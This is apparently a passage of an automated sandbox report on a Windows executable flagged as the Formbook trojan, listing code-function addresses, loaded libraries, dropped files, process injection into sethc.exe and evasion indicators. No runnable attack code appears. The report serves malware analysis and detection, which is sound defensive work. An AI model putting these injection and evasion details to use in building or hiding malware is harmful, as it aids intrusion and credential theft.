Source: C:\Users\user\Desktop\rpedido-00035.exe | File created: C:\Windows\resources\0409
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00404D90
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00406ABA
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3603C600
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360CD646
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36044670
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DA6C0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3601C6E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360936EC
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DF6F6
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D6757
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36022760
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3602A760
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36020445
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360EA526
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DF5C9
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D75C6
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D124C
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600D2EC
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3602E310
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DF330
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360CE076
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3605508C
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360100A0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3602B0D0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D70F1
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360E010E
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600F113
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360BD130
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3606717A
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360251C0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3603B1E0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36040E50
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360C0E6D
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D0EAD
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36021EB2
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D9ED2
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36012EE8
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3602CF00
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DFF63
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DEFBF
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D1FC6
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36026FE0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36010C12
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3602AC20
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360CEC4C
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36023C60
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D6C69
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DEC60
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360B9C98
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36038CDF
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3603FCE0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360EACEB
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3601AD00
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DFD27
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360D7D4C
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36020D69
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36032DB0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36029DD0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360BFDF4
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DCA13
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DEA5B
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DFA89
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3603FAA0
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36020B10
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360DFB2E
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D0445
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0453D480
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0459A526
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458F5C9
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045875C6
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0457D646
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044F4670
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044EC600
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0456D62C
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458A6C0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044CC6E0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458F6F6
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045436EC
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D0680
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04586757
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D2760
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044DA760
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0457E076
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044DB0D0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045870F1
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0450508C
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044C00A0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0451717A
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0459010E
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044BF113
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0456D130
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D51C0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044EB1E0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458124C
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044BD2EC
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044DE310
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458F330
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044C1380
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0457EC4C
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D3C60
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04586C69
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458EC60
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044C0C12
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044DAC20
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044E8CDF
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044EFCE0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0459ACEB
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04569C98
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04587D4C
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D0D69
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044CAD00
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458FD27
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D9DD0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0456FDF4
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044E2DB0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04512E48
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044F0E50
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04570E6D
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04589ED2
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044C2EE8
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04580EAD
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D1EB2
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458FF63
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044DCF00
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04581FC6
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D6FE0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458EFBF
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044B6868
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458F872
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D9870
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044EB870
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D3800
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044FE810
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04570835
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045818DA
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D28C0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045878F3
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044E6882
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045498B2
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_045159C0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044CE9A0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458E9A6
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458EA5B
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458CA13
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458FA89
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044EFAA0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0450DB19
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044D0B10
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_0458FB2E
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_04544BC0
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DF01D
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DE465
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DE463
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DE7FD
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DD868
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DE97C
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DCB08
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DE348
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 04505050 appears 36 times
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 0454EF10 appears 105 times
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 0453E692 appears 84 times
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 044BB910 appears 266 times
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: String function: 04517BE4 appears 88 times
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: String function: 36067BE4 appears 76 times
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: String function: 3608E692 appears 80 times
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: String function: 3600B910 appears 190 times
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: String function: 3609EF10 appears 78 times
            Source: rpedido-00035.exe | Static PE information: invalid certificate
            Source: rpedido-00035.exe, 00000000.00000000.43566959444.0000000000457000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameloyaliteters radierne.exeR vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000003.44782208695.0000000035DAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000003.44785542514.0000000035F65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rpedido-00035.exe
            Source: rpedido-00035.exe, 00000002.00000003.44836446752.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesethc.exej% vs rpedido-00035.exe
            Source: rpedido-00035.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@5/8@2/2
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00404814 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk
            Source: C:\Users\user\Desktop\rpedido-00035.exe | File created: C:\Users\user\AppData\Local\Temp\nszDD93.tmp
            Source: rpedido-00035.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rpedido-00035.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: rpedido-00035.exe | ReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\rpedido-00035.exe | File read: C:\Users\user\Desktop\rpedido-00035.exe
            Source: unknown | Process created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Process created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Process created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: umpdc.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: playsndsrv.dll
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: oleacc.dll
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: dui70.dll
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: wininet.dll
            Source: C:\Windows\explorer.exe | Section loaded: fhcfg.dll
            Source: C:\Windows\explorer.exe | Section loaded: efsutil.dll
            Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
            Source: C:\Windows\explorer.exe | Section loaded: dsrole.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.internal.system.userprofile.dll
            Source: C:\Windows\explorer.exe | Section loaded: cloudexperiencehostbroker.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\rpedido-00035.exe | File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.ini
            Source: rpedido-00035.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rpedido-00035.exe, rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe

            Data Obfuscation

            Source: Yara match | File source: 00000002.00000002.44867701457.0000000002159000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.44560230071.0000000003D19000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.44867701457.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.44559719436.0000000002908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.44560230071.0000000003220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Meningorrhoea.Tig, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\nszDD94.tmp, type: DROPPED
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_044C08CD push ecx; mov dword ptr [esp], ecx 4_2_044C08D6
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043D5485 push ebx; retf 4_2_043D54B6
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043D3DF4 push es; ret 4_2_043D3DFE
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043D5F61 pushfd ; iretd 4_2_043D5F62
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DF7B3 push 00000006h; iretd 4_2_043DF7B5
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DD1DF push 0000000Eh; iretd 4_2_043DD1E6
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043E5272 push eax; ret 4_2_043E5274
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043D0A66 push esp; iretd 4_2_043D0A6E
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043DBB38 push edx; ret 4_2_043DBB49
            Source: C:\Windows\SysWOW64\sethc.exe | Code function: 4_2_043D5BFD push ss; retf 4_2_043D5C05
            Source: C:\Users\user\Desktop\rpedido-00035.exe | File created: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sethc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\rpedido-00035.exe API/Special instruction interceptor: Address: 4608F3A
            Source: C:\Users\user\Desktop\rpedido-00035.exe API/Special instruction interceptor: Address: 2A48F3A
            Source: C:\Users\user\Desktop\rpedido-00035.exe API/Special instruction interceptor: Address: 7FFB05810594
            Source: C:\Users\user\Desktop\rpedido-00035.exe API/Special instruction interceptor: Address: 7FFB0580FF74
            Source: C:\Users\user\Desktop\rpedido-00035.exe API/Special instruction interceptor: Address: 7FFB0580D6C4
            Source: C:\Users\user\Desktop\rpedido-00035.exe API/Special instruction interceptor: Address: 7FFB0580D864
            Source: C:\Windows\SysWOW64\sethc.exe API/Special instruction interceptor: Address: 7FFB0580D144
